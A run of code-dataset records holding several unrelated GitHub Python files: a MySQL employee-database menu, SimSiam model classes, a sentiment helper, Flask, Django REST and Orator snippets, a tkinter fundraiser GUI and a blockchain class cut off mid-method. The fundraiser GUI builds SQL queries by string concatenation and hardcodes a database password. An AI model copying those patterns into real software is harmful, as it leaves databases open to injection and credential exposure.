%s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, WORKS_ON Essn references employee ssn\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from WORKS_ON WHERE Essn = %s\"\n mycursor.execute(Query, (Ssn,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n \n # Delete if no dependencies, else ask them to remove the dependencies\n if (Dependencies == True):\n print(\"Dependencies exist, remove them first before deleting employee profile\\n\")\n database.commit()\n return\n else:\n print(\"No dependencies exist the profile will be deleted.\")\n Query = \"DELETE from EMPLOYEE WHERE Ssn = %s\"\n mycursor.execute(Query, (Ssn, )) \n database.commit()\n\n\ndef RemoveDepartment(database):\n mycursor = database.cursor()\n # Ask for the Dnumber\n department = input(\"Enter an Dnumber: \")\n\n # Lock and show department information\n Query = (\"SELECT * FROM DEPARTMENT WHERE Dnumber = %s FOR UPDATE\")\n mycursor.execute(Query, (department, )) \n result = mycursor.fetchall()\n print(\"\\nDepartment entry for deletion\\n---------------------\")\n for i in result:\n print(i)\n print()\n\n # Ask confirmation for 
deletion\n confirm = True\n while (confirm):\n Confirmation = input(\"\\n1) Enter \\\"Yes\\\" if you wish to delete\\n2) Enter \\\"No\\\" to cancel\\n\")\n if (Confirmation.isalpha() == True):\n if (Confirmation.upper() == \"YES\"):\n confirm = False\n elif (Confirmation.upper() == \"NO\"):\n print()\n return\n\n # Check if any dependencies exist\n print()\n Dependencies = False\n\n\n # Constraint 1: Foreign Key Constraint, DEPT_LOCATIONS Dnumber references department Dnumber\n Query = \"select COUNT(Dnumber) from DEPT_LOCATIONS WHERE Dnumber = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, DEPT_LOCATIONS Dnumber references department Dnumber\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from DEPT_LOCATIONS WHERE Dnumber = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n\n # Constraint 2: Foreign Key Constraint, EMPLOYEE Dno references department Dnumber\n Query = \"select COUNT(Dno) from EMPLOYEE WHERE Dno = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, EMPLOYEE Dno references department Dnumber\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from EMPLOYEE WHERE Dno= %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n # Constraint 3: Foreign Key Constraint, PROJECT Dnum references department DNumber\n Query = \"select COUNT(Dnum) from PROJECT WHERE Dnum = %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n if (i[0] != 0):\n print(\"Error: Foreign Key Constraint, PROJECT Dnum references department DNumber\\n----------------------------------------------------\")\n Dependencies = True\n # Print the dependencies\n Query = \"select * from PROJECT WHERE Dnum= %s\"\n mycursor.execute(Query, (department,)) \n result = mycursor.fetchall()\n for i in result:\n print(i)\n print()\n\n\n # Delete if no dependencies, else ask them to remove the dependencies\n if (Dependencies == True):\n print(\"Dependencies exist, remove them first before deleting department\")\n database.commit()\n return\n else:\n print(\"No dependencies exist the department will be deleted.\")\n Query = \"DELETE from DEPARTMENT WHERE Dnumber= %s\"\n mycursor.execute(Query, (department, )) \n database.commit()\n\ndef ViewDepartment(database): \n mycursor = database.cursor()\n # input the depratment number\n Dnumber = input(\"Enter the Department number: \")\n print()\n\n # Show the managers name\n Query = (\"SELECT Fname, Minit, Lname FROM DEPARTMENT, EMPLOYEE WHERE Dnumber = %s AND Mgr_ssn = Ssn\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n print(\"Department Manager\\n---------------------\")\n for Fname, Minit, Lname in result:\n print(\"First name: \"+ Fname)\n print(\"Middle intial: \"+ Minit)\n print(\"last name: \"+ Lname)\n print()\n\n\n\n # Display all the locations\n print(\"All locations\\n--------------\")\n Query = (\"SELECT Dlocation FROM DEPARTMENT, DEPT_LOCATIONS WHERE DEPARTMENT.Dnumber = %s AND DEPARTMENT.Dnumber = DEPT_LOCATIONS.Dnumber\")\n mycursor.execute(Query, (Dnumber, )) \n result = mycursor.fetchall()\n for i in 
result:\n print(i[0])\n print()\n\n\n\n\ndef Menu(database):\n # when selecting an option type the number corresponding to that option\n ExitProgram = 0\n Menu = (\"Select an option:\\n\\t\\t(1)--Add new employee\\n\\t\\t(2)--View employee\\n\\t\\t(3)--Modify employee\\n\\t\\t(4)--Remove employee\" +\n \"\\n\\t\\t(5)--Add new dependent\\n\\t\\t(6)--Remove dependent\\n\\t\\t(7)--Add new department\\n\\t\\t(8)--View department\" +\n \"\\n\\t\\t(9)--Remove department\\n\\t\\t(10)-Add department location\\n\\t\\t(11)-Remove department location\\n\\t\\t(12)-Exit program\") \n\n\n while (ExitProgram == 0): \n print(Menu)\n option = 100\n while (1): # Input error handling\n try:\n option = int(input(\"Enter an option: \"))\n if (option < 1 or option > 12):\n raise ValueError\n except ValueError:\n print(\"Try again and enter a valid number\")\n else:\n break\n\n if (option == 1): # Option handling\n AddNewEmployee(database)\n elif (option == 2):\n ViewEmployee(database)\n elif (option == 3):\n ModifyEmployee(database)\n elif (option == 4):\n RemoveEmployee(database)\n elif (option == 5):\n AddNewDependent(database)\n elif (option == 6):\n RemoveDependent(database) \n elif (option == 7):\n AddNewDepartment(database)\n elif (option == 8):\n ViewDepartment(database)\n elif (option == 9):\n RemoveDepartment(database)\n elif (option == 10):\n AddDepartmentLocation(database)\n elif (option == 11):\n RemoveDepartmentLocation(database)\n elif (option == 12):\n ExitProgram = 1\n database.close()\n\n\nif __name__ == \"__main__\":\n\n\t# password has been removed \n mydb = mysql.connector.connect(user='root', password='', host='localhost', database='COMPANY') \n\n mycursor = mydb.cursor()\n Menu(mydb)\n \n mydb.close()\n mycursor.close()\n\n\n\n\n\n\n","repo_name":"cseuconn/OS-4300-2022-Spring","sub_path":"Harold_Suquillo/Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":32841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29052401628","text":"import torch.nn as nn\nfrom modules.dgcnn_dense import DGCNN_dense\n\nclass DenseSimSiam(nn.Module):\n \"\"\"\n Build a SimSiam model.\n \"\"\"\n def __init__(self, base_encoder=DGCNN_dense, args=None, seg_num_all=50):\n \"\"\"\n dim: feature dimension (default: 2048)\n pred_dim: hidden dimension of the predictor (default: 512)\n \"\"\"\n super(DenseSimSiam, self).__init__()\n channel = 256\n # create the encoder\n # num_classes is the output fc dimension, zero-initialize last BNs\n self.encoder = base_encoder(args=args, seg_num_all=seg_num_all)\n\n # build a 2-layer predictor\n self.predictor = nn.Sequential(nn.Linear(channel, 512, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Linear(512, channel, bias=False)) # output layer\n\n self.classifier = nn.Sequential(\n nn.Conv1d(channel, 512, 1, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(512, channel, 1, bias=False)\n )\n\n def forward(self, x1, x2, get_feature=False):\n \"\"\"\n Input:\n x1: first views of images\n x2: second views of images\n Output:\n p1, p2, z1, z2: predictors and targets of the network\n See Sec. 
3 of https://arxiv.org/abs/2011.10566 for detailed notations\n \"\"\"\n\n # compute features for one view\n z1, ptfeature1, x_z1 = self.encoder(x1, get_feature) # NxC\n z2, ptfeature2, x_z2 = self.encoder(x2, get_feature) # NxC\n p1 = self.predictor(z1) # NxC\n p2 = self.predictor(z2) # NxC\n\n ptfeature1_pred = self.classifier(ptfeature1)\n ptfeature2_pred = self.classifier(ptfeature2)\n\n return p1, p2, z1.detach(), z2.detach(), ptfeature1_pred, ptfeature2_pred, ptfeature1.detach(), ptfeature2.detach(), x_z1, x_z2\n\nclass DenseSimSiam_Region(nn.Module):\n \"\"\"\n Build a SimSiam model.\n \"\"\"\n def __init__(self, args=None):\n \"\"\"\n dim: feature dimension (default: 2048)\n pred_dim: hidden dimension of the predictor (default: 512)\n \"\"\"\n super(DenseSimSiam_Region, self).__init__()\n channel = 256\n self.project = nn.Sequential(\n nn.Conv1d(channel, 512, 1, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(512, 256, 1, bias=False),\n nn.BatchNorm1d(256),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(256, channel, 1, bias=False),\n nn.BatchNorm1d(channel)\n ) # output layer\n self.predictor_region = nn.Sequential(\n nn.Conv1d(channel, 512, 1, bias=False),\n nn.BatchNorm1d(512),\n nn.LeakyReLU(negative_slope=0.2, inplace=True), # hidden layer\n nn.Conv1d(512, channel, 1, bias=False)\n )\n\n def forward(self, x1, x2, get_feature=False):\n \"\"\"\n Input:\n x1: first views of images\n x2: second views of images\n Output:\n p1, p2, z1, z2: predictors and targets of the network\n See Sec. 3 of https://arxiv.org/abs/2011.10566 for detailed notations\n \"\"\"\n\n # compute features for one view\n\n region1 = self.project(x1) # NxC\n region2 = self.project(x2) # NxC\n\n region1_pred = self.predictor_region(region1)\n region2_pred = self.predictor_region(region2)\n\n return region1_pred, region2_pred, region1.detach(), region2.detach()","repo_name":"caoxin918/ULD-Net-3D-Unsupervised-Learning-by-Dense-Similarity-Learning-with-Equivariant-Crop","sub_path":"modules/ContrastModel.py","file_name":"ContrastModel.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18628950378","text":"from vaderSentiment_fr.vaderSentiment import SentimentIntensityAnalyzer\r\nclass AnalyserSentiment :\r\n def __init__(self) :\r\n self.data=[]\r\n\r\n def analyzeSentiment(self,tab_to_analyse):\r\n annalyser = SentimentIntensityAnalyzer()\r\n for line in tab_to_analyse :\r\n line_score = annalyser.polarity_scores(line)\r\n self.data.append(line_score[\"compound\"])\r\n return self.data\r\n\r\n def analyzeSentiment2(self, tab_to_analyse):\r\n annalyser = SentimentIntensityAnalyzer()\r\n commentaire=[\"Commentaire\"]\r\n line_score = annalyser.polarity_scores(commentaire)\r\n score=line_score[\"compound\"]\r\n return score","repo_name":"natsuDon/projetCitadek","sub_path":"analyser_entiment.py","file_name":"analyser_entiment.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74564597228","text":"from orator.migrations import Migration\n\n# python db.py make:migration create_posts_table --table=posts --create\n\nclass CreatePostsTable(Migration):\n\n def up(self):\n \"\"\"\n Run the migrations.\n \"\"\"\n with self.schema.create('posts') as table:\n table.increments('id')\n table.integer('user_id')\n 
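The DenseSimSiam forward above hands back predictor outputs together with detached targets but stops short of the loss itself. Per Sec. 3 of the SimSiam paper it cites (arXiv:2011.10566), the objective is the symmetrized negative cosine similarity against the stop-gradient branch; a minimal sketch, assuming N x C PyTorch tensors:

import torch.nn.functional as F

def simsiam_loss(p1, p2, z1, z2):
    # z1 and z2 arrive already detached from the model's forward pass,
    # so gradients flow only through the predictor outputs p1 and p2
    return -0.5 * (F.cosine_similarity(p1, z2, dim=1).mean()
                   + F.cosine_similarity(p2, z1, dim=1).mean())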
table.string('title')\n table.text('body')\n table.timestamps()\n table.soft_deletes()\n table.index(['user_id', 'deleted_at'], name='user_posts')\n\n def down(self):\n \"\"\"\n Revert the migrations.\n \"\"\"\n self.schema.drop('posts')\n","repo_name":"asj214/flask_orator","sub_path":"migrations/2020_04_08_215845_create_posts_table.py","file_name":"2020_04_08_215845_create_posts_table.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"1614926179","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom flask import Flask,render_template,request\r\nimport sqlite3\r\nimport json\r\n\r\napp=Flask(__name__)\r\n\r\n# Connect to the temporary database\r\ndata_base = sqlite3.connect('temp.db', check_same_thread=False)\r\nc = data_base.cursor()\r\n\r\n# Set up the front-end template\r\n@app.route('/')\r\ndef index():\r\n return render_template(\"index.html\")\r\n\r\n\r\n# Set up the data source\r\n@app.route('/data')\r\ndef data():\r\n global tmp_time,c\r\n sql='select * from scores'\r\n c.execute(sql)\r\n arr=[]\r\n for i in c.fetchall():\r\n arr.append([i[0]*1000,i[1]])\r\n return json.dumps(arr)\r\n\r\n# Start the server and set the port\r\ndef start():\r\n app.run(host='0.0.0.0',port=9090)\r\n\r\n\r\n\r\n","repo_name":"liangzp/DQLearning-Toolbox","sub_path":"flask_tk.py","file_name":"flask_tk.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"zh","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} {"seq_id":"33608104993","text":"from rest_framework import serializers\n\nfrom apps.inventories.models import Inventory\n\n\nclass InventorySerializer(serializers.ModelSerializer):\n total_price = serializers.IntegerField(read_only=True)\n branch_name = serializers.CharField(read_only=True)\n\n class Meta:\n model = Inventory\n fields = '__all__'\n read_only_fields = ('id', 'inventory_number')\n","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/inventories/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"74647765868","text":"#coding=utf-8\n\nimport urllib.request\nimport urllib.parse\n\nclass HttpRequest(object):\n def __init__(self, url):\n self.url = url\n\n def get(self, param):\n params = urllib.parse.urlencode(param)\n url = self.url + '?%s' %params\n with urllib.request.urlopen(url) as response:\n result = response.read().decode('utf-8')\n return result\n\n def post(self, param):\n data = urllib.parse.urlencode(param)\n data = data.encode()\n with urllib.request.urlopen(self.url, data) as response:\n result = response.read().decode('utf-8')\n return result\n\nif __name__ == '__main__':\n request = HttpRequest('https://www.baidu.com/')\n s = request.post('')\n print (s)","repo_name":"cc397845236/Tools","sub_path":"HTTPRequest.py","file_name":"HTTPRequest.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"73932410666","text":"from ctypes import alignment\nfrom tkinter import *\nfrom tkinter.messagebox import showerror\nfrom tkinter.ttk import Combobox\nimport mysql.connector\n\n# Create a connection to the database\nmydb = mysql.connector.connect(\n host = \"localhost\",\n user = \"root\",\n password = \"password\",\n database = \"zoodatabase\",\n autocommit = True\n)\n\nmycursor = mydb.cursor(prepared=True)\n\ndef show_fundraiser(event):\n fundraiser = fundraiserSelection.get()\n 
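The tkinter record that begins here drives all of its browsing behavior through the ttk.Combobox '<<ComboboxSelected>>' virtual event, as the show_fundraiser function this record opens with illustrates. A self-contained sketch of that binding pattern, detached from the zoo database (the values are dummy IDs):

from tkinter import Tk, Label, StringVar
from tkinter.ttk import Combobox

root = Tk()
choice = StringVar()
box = Combobox(root, textvariable=choice, values=('101', '102', '103'),
               state='readonly')  # readonly: the user must pick from the list
label = Label(root, text='Fundraiser ID: None selected')
box.bind('<<ComboboxSelected>>',
         lambda event: label.config(text='Fundraiser ID: ' + choice.get()))
box.pack(padx=10, pady=5)
label.pack(padx=10, pady=5)
root.mainloop()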
fundraiserLabel.config(text=\"Fundraiser ID: \" + fundraiser)\n\n mycursor.execute(\"SELECT Theme FROM Fundraiser WHERE FundraiserID = '%s'\"%fundraiser)\n result = str(mycursor.fetchall()[0][0])\n if result == \"None\":\n result = \"N/A\"\n themeLabel.config(text=\"Theme: \" + result)\n\n return\n\n\ndef doneClick():\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n \n set_fundraisers_frame(savedFFrame, managerID, True)\n return\n\ndef deleteClick():\n delValue = fselectBox.get()\n mycursor.execute(\"DELETE FROM Fundraiser WHERE FundraiserID=\" + delValue)\n return\n\ndef delFundraiser():\n # Refresh the page\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n\n # create delete page\n fselectLabel = Label(fundraisersFrame,text=\"Select Fundraiser: \")\n global fselectBox\n delValue = \"\"\n fselectBox = Combobox(fundraisersFrame, width = 30, textvariable = delValue)\n fselectLabel.grid(row=1,column=0,sticky=E,padx=5,pady=10)\n fselectBox.grid(row=1,column=1,sticky=E+W,padx=5,pady=10)\n fselectButton = Button(fundraisersFrame, text=\"Delete\", command=deleteClick)\n fselectButton.grid(row=1,column=2,stick=W)\n\n mycursor.execute(\"SELECT FundraiserID FROM Overlooks WHERE Manager_EID=\"+managerID)\n result = mycursor.fetchall()\n\n fselectBox['values'] = result\n fselectBox['state'] = 'readonly'\n\n doneButton = Button(fundraisersFrame, text=\"Done\", command=doneClick)\n doneButton.grid(row=2, columnspan=3)\n\n return\n\ndef modClick():\n originalFID = modFSelectBox.get()\n newFID = modFidBox.get()\n\n # Keep original values the same if not modified\n if newFID == '':\n newFID = originalFID\n\n newFTheme = modFthemeBox.get()\n if newFTheme == '':\n mycursor.execute(\"SELECT Theme FROM Fundraiser WHERE FundraiserID=\"+originalFID)\n newFTheme = str(mycursor.fetchall()[0][0])\n\n try:\n sql_update_query = \"\"\"UPDATE Fundraiser SET FundraiserID=%s, Theme=%s WHERE FundraiserID=%s\"\"\"\n data_tuple = (newFID,newFTheme,originalFID)\n mycursor.execute(sql_update_query, data_tuple)\n except:\n showerror(title=\"Error\", message=\"Invalid FundraiserID or Theme. 
Please try again.\")\n return\n\ndef modFundraiser():\n\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n\n fname = StringVar()\n fselectLabel = Label(fundraisersFrame,text=\"Select Fundraiser: \")\n global modFSelectBox\n delValue = \"\"\n modFSelectBox = Combobox(fundraisersFrame, width = 30, textvariable = delValue)\n fselectLabel.grid(row=0,column=0,sticky=E,padx=5,pady=10)\n modFSelectBox.grid(row=0,column=1,sticky=E+W,padx=5,pady=10)\n\n mycursor.execute(\"SELECT FundraiserID FROM Overlooks WHERE Manager_EID=\"+managerID)\n result = mycursor.fetchall()\n\n modFSelectBox['values'] = result\n modFSelectBox['state'] = 'readonly'\n\n fidLabel = Label(fundraisersFrame,text=\"Set FundraiserID: \")\n global modFidBox\n fid = \"\"\n modFidBox = Entry(fundraisersFrame, width = 30, textvariable = fid)\n fidLabel.grid(row=1,column=0,sticky=E,padx=5,pady=10)\n modFidBox.grid(row=1,column=1,sticky=E+W,padx=5,pady=10)\n\n fthemeLabel = Label(fundraisersFrame,text=\"Set Theme: \")\n global modFthemeBox\n ftheme = \"\"\n modFthemeBox = Entry(fundraisersFrame, width = 30, textvariable = ftheme)\n fthemeLabel.grid(row=2,column=0,sticky=E,padx=5,pady=10)\n modFthemeBox.grid(row=2,column=1,sticky=E+W,padx=5,pady=10)\n\n modButton = Button(fundraisersFrame, text=\"Update\", command=modClick)\n modButton.grid(row=3,column=1)\n\n doneButton = Button(fundraisersFrame, text=\"Done\", command=doneClick)\n doneButton.grid(row=4,column=1)\n\n return\n\ndef addClick():\n fid = fidBox.get()\n ftheme = fthemeBox.get()\n try:\n sql_insert_query = \"\"\"INSERT INTO Fundraiser VALUES (%s, %s)\"\"\"\n data_tuple = (fid,ftheme)\n mycursor.execute(sql_insert_query, data_tuple)\n sql_insert_query = \"\"\"INSERT INTO Overlooks VALUES (%s, %s)\"\"\"\n data_tuple = (managerID,fid)\n mycursor.execute(sql_insert_query, data_tuple)\n except:\n showerror(title=\"Error\",message=\"Invalid FundraiserID or Theme. 
Please try again.\")\n return\n\ndef addFundraiser():\n\n for w in fundraisersFrame.winfo_children():\n w.destroy()\n\n fidLabel = Label(fundraisersFrame,text=\"FundraiserID: \")\n global fidBox\n fid = \"\"\n fidBox = Entry(fundraisersFrame, width = 30, textvariable = fid)\n fidLabel.grid(row=1,column=0,sticky=E,padx=5,pady=10)\n fidBox.grid(row=1,column=1,sticky=E+W,padx=5,pady=10)\n\n fthemeLabel = Label(fundraisersFrame,text=\"Theme: \")\n global fthemeBox\n ftheme = \"\"\n fthemeBox = Entry(fundraisersFrame, width = 30, textvariable = ftheme)\n fthemeLabel.grid(row=2,column=0,sticky=E,padx=5,pady=10)\n fthemeBox.grid(row=2,column=1,sticky=E+W,padx=5,pady=10)\n\n addButton = Button(fundraisersFrame, text=\"Add\", command=addClick)\n addButton.grid(row=3,columnspan=2)\n\n doneButton = Button(fundraisersFrame, text=\"Done\", command=doneClick)\n doneButton.grid(row=4, columnspan=2)\n\n return\n\n\ndef set_fundraisers_frame(sFrame, mID, e):\n global fundraisersFrame\n global savedFFrame\n fundraisersFrame = sFrame\n savedFFrame = sFrame\n\n global managerID\n managerID = str(mID)\n\n global editable\n editable = e\n\n if editable:\n delB = Button(fundraisersFrame,text=\"Delete a Fundraiser\",command=delFundraiser)\n delB.grid(column = 0, row = 0, padx=5, pady=5, sticky=N+W)\n modB = Button(fundraisersFrame,text=\"Modify a Fundraiser\",command=modFundraiser)\n modB.grid(column = 0, row = 1, padx=5, pady=5, sticky=N+W)\n addB = Button(fundraisersFrame,text=\"Add a Fundraiser\",command=addFundraiser)\n addB.grid(column = 0, row = 2, padx=5, pady=5, sticky=N+W)\n\n\n text = Label(fundraisersFrame, text=\"Browse fundraisers\")\n text.grid(column = 1, row = 0, sticky=S, ipadx=300, ipady=20)\n global fundraiserSelection\n currValue = StringVar()\n fundraiserSelection = Combobox(fundraisersFrame, width = 30, textvariable = currValue)\n fundraiserSelection.grid(column = 1, row = 1, padx=300, pady=20, sticky=N+S+E+W)\n\n mycursor.execute(\"SELECT FundraiserID FROM Overlooks WHERE Manager_EID=\"+managerID)\n result = mycursor.fetchall()\n\n fundraiserSelection['values'] = result\n fundraiserSelection['state'] = 'readonly'\n\n fundraiserSelection.bind('<>', show_fundraiser)\n\n # Create text for fundraiser info\n global fundraiserLabel\n global themeLabel\n\n fundraiserLabel = Label(fundraisersFrame, text=\"Fundraiser ID: None selected\")\n fundraiserLabel.grid(column = 1, row = 2, padx=300, pady=20, sticky=S+E+W)\n themeLabel = Label(fundraisersFrame, text=\"Theme: \")\n themeLabel.grid(column = 1, row = 3, padx=300, pady=20, sticky=N+S+E+W)\n","repo_name":"MackenzieBowal/ZooDatabase_Project","sub_path":"gui/fundraisers.py","file_name":"fundraisers.py","file_ext":"py","file_size_in_byte":7324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70352792426","text":"import os\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import GroupKFold, train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport torch.optim as optim\nfrom transformers import get_linear_schedule_with_warmup\n\nimport config\nimport dataset\nimport engine\nimport models\nimport utils\n\n\nwarnings.filterwarnings(\"ignore\")\n# For descriptive error messages\nos.environ['CUDA_LAUNCH_BLOCKING'] = \"1\"\n\n\ndef run():\n if not os.path.exists(config.OUT_DIR):\n os.makedirs(config.OUT_DIR)\n\n df = pd.read_csv(f\"{config.ROOT_DIR}/train.csv\")\n\n if config.DEBUG:\n kf = GroupKFold(n_splits=11)\n for fold, (_, valid_index) 
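The fundraisers GUI record above mixes two query styles: `modClick` and `addClick` bind values with `%s` placeholders, while `deleteClick` concatenates the combobox value straight into the DELETE statement, which is open to SQL injection and never commits. A minimal sketch of the parameterized form, assuming the same MySQL-style DB-API cursor `mycursor` plus a connection object (here hypothetically named `mydb`):

def delete_fundraiser(mycursor, mydb, fundraiser_id):
    # Parameter binding keeps user input out of the SQL text itself.
    mycursor.execute("DELETE FROM Fundraiser WHERE FundraiserID = %s", (fundraiser_id,))
    mydb.commit()  # DELETE/UPDATE/INSERT only take effect after commit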
in enumerate(kf.split(df, df['id'], df['point_of_interest'])):\n if fold == 5: # pick only fold 5 for debug\n df = df.iloc[valid_index].reset_index(drop=True)\n \n for col in [\"name\", \"address\", \"city\", \"state\", \"zip\", \"country\", \"url\", \"phone\", \"categories\"]:\n df[col] = df[col].fillna(\"\")\n\n df[\"fulltext\"] = (\n df[\"name\"] + \" \" + df[\"address\"] + \" \" + df[\"city\"] + \" \" + df[\"state\"] + \" \" + df[\"country\"] + \" \" + df[\"categories\"]\n ).replace(r'\\s+', ' ', regex=True)\n\n # preprocess of string\n df[\"fulltext\"] = df[\"fulltext\"].str.lower() # lowercase\n df[\"fulltext\"] = df[\"fulltext\"].str.replace(r'[^\\w\\s]+', '') # remove punctuation\n\n # Standardization of coordinates.\n # https://datascience.stackexchange.com/questions/13567/ways-to-deal-with-longitude-latitude-feature\n df[\"coord_x\"] = np.cos(df[\"latitude\"]) * np.cos(df[\"longitude\"])\n df[\"coord_y\"] = np.cos(df[\"latitude\"]) * np.sin(df[\"longitude\"])\n df[\"coord_z\"] = np.sin(df[\"latitude\"])\n\n # print(df.shape)\n # print(df.head())\n\n df_train, df_valid = train_test_split(df, random_state=config.seed, shuffle=True, test_size=0.2)\n df_train = df # 訓練にデータ全部使う\n df_valid = df_valid[df_valid.point_of_interest.isin(df_train.point_of_interest.unique())]\n\n config.n_classes = df_train.point_of_interest.nunique()\n print(\"Number of classes\", config.n_classes)\n\n encoder = LabelEncoder()\n df_train['point_of_interest'] = encoder.fit_transform(df_train['point_of_interest'])\n df_valid['point_of_interest'] = encoder.transform(df_valid['point_of_interest'])\n\n utils.set_seed(42)\n\n model = models.FSMultiModalNet(config.model_name)\n model.to(config.device)\n\n train_loader, valid_loader = dataset.prepare_loaders(df_train, df_valid)\n\n optimizer = optim.Adam(model.parameters(), lr=config.lr, weight_decay=config.weight_decay)\n \n scheduler = get_linear_schedule_with_warmup(\n optimizer, \n num_warmup_steps=len(train_loader) * 2, \n num_training_steps=len(train_loader) * config.epochs\n )\n\n model, history = engine.run_training(\n model,\n optimizer,\n scheduler,\n train_loader,\n valid_loader,\n device=config.device,\n num_epochs=config.epochs\n )\n\nif __name__ == '__main__':\n run()\n","repo_name":"heartkilla/mcd-kaggle-fsq","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4228729306","text":"from block import block as Block\r\nfrom blockchain_utils import blockchain_utils\r\nfrom account_model import account_model\r\nfrom proof_of_stake import proof_of_stake\r\n\r\n\r\nclass blockchain():\r\n \r\n def __init__(self):\r\n self.blocks = [Block.genesis()]\r\n self.account_model = account_model()\r\n self.pos = proof_of_stake()\r\n \r\n def add_block(self, block):\r\n self.execute_transactions(block.transactions)\r\n if self.blocks[-1].block_count < block.block_count:\r\n self.blocks.append(block)\r\n \r\n def toJson(self):\r\n data = {}\r\n json_blocks = []\r\n for block in self.blocks:\r\n json_blocks.append(block.toJson())\r\n data[\"blocks\"] = json_blocks\r\n return data\r\n \r\n def block_count_valid(self, block):\r\n if self.blocks[-1].block_count == block.block_count - 1:\r\n return True\r\n else:\r\n return False\r\n \r\n def last_block_hash_valid(self, block):\r\n latest_blockchain_block_hash = blockchain_utils.hash(self.blocks[-1].payload()).hexdigest()\r\n if latest_blockchain_block_hash == 
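The coordinate standardization in the training script above applies `np.cos`/`np.sin` directly to latitude and longitude columns; numpy's trig functions expect radians, so degree-valued coordinates usually need a conversion first. A sketch of the unit-sphere mapping with that step made explicit (DataFrame and column names follow the script):

import numpy as np
import pandas as pd

def add_unit_sphere_coords(df: pd.DataFrame) -> pd.DataFrame:
    # Convert degrees to radians before the trig calls.
    lat = np.radians(df["latitude"])
    lon = np.radians(df["longitude"])
    df["coord_x"] = np.cos(lat) * np.cos(lon)
    df["coord_y"] = np.cos(lat) * np.sin(lon)
    df["coord_z"] = np.sin(lat)
    return df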
block.last_hash:\r\n return True\r\n else:\r\n return False\r\n \r\n def get_covered_transaction_set(self, transactions):\r\n covered_transactions = []\r\n for transaction in transactions:\r\n if self.transaction_covered(transaction):\r\n covered_transactions.append(transaction)\r\n return covered_transactions\r\n \r\n def transaction_covered(self, transaction):\r\n if transaction.type == \"EXCHANGE\" :\r\n return True\r\n sender_balance = self.account_model.get_balance(transaction.sender_public_key)\r\n if sender_balance >= transaction.amount:\r\n return True\r\n else:\r\n return False\r\n \r\n def execute_transactions(self, transactions):\r\n for transaction in transactions:\r\n self.execute_transaction(transaction)\r\n \r\n def execute_transaction(self, transaction):\r\n if transaction.type == \"POST\":\r\n sender = transaction.sender_public_key\r\n receiver = transaction.receiver_public_key\r\n if sender == receiver:\r\n amount = transaction.amount\r\n self.pos.update(sender, 0)\r\n self.account_model.update_balance(sender, -amount)\r\n \r\n def next_forger(self):\r\n last_block_hash = blockchain_utils.hash(self.blocks[-1].payload()).hexdigest()\r\n next_forger = self.pos.forger(last_block_hash)\r\n return next_forger\r\n \r\n def create_block(self, transaction_from_pool, forger_wallet):\r\n covered_transactions = self.get_covered_transaction_set(transaction_from_pool)\r\n self.execute_transactions(covered_transactions)\r\n new_block = forger_wallet.create_block(covered_transactions, blockchain_utils.hash(self.blocks[-1].payload()).hexdigest(), len(self.blocks))\r\n self.blocks.append(new_block)\r\n return new_block\r\n \r\n def transaction_exists(self, transaction):\r\n for block in self.blocks:\r\n for block_transaction in block.transactions:\r\n if transaction.equals(block_transaction):\r\n return True\r\n return False\r\n \r\n def forger_valid(self, block):\r\n forger_public_key = self.pos.forger(block.last_hash)\r\n proposed_block_forger = block.forger\r\n if forger_public_key == proposed_block_forger:\r\n return True\r\n else:\r\n return False\r\n \r\n def transaction_valid(self, 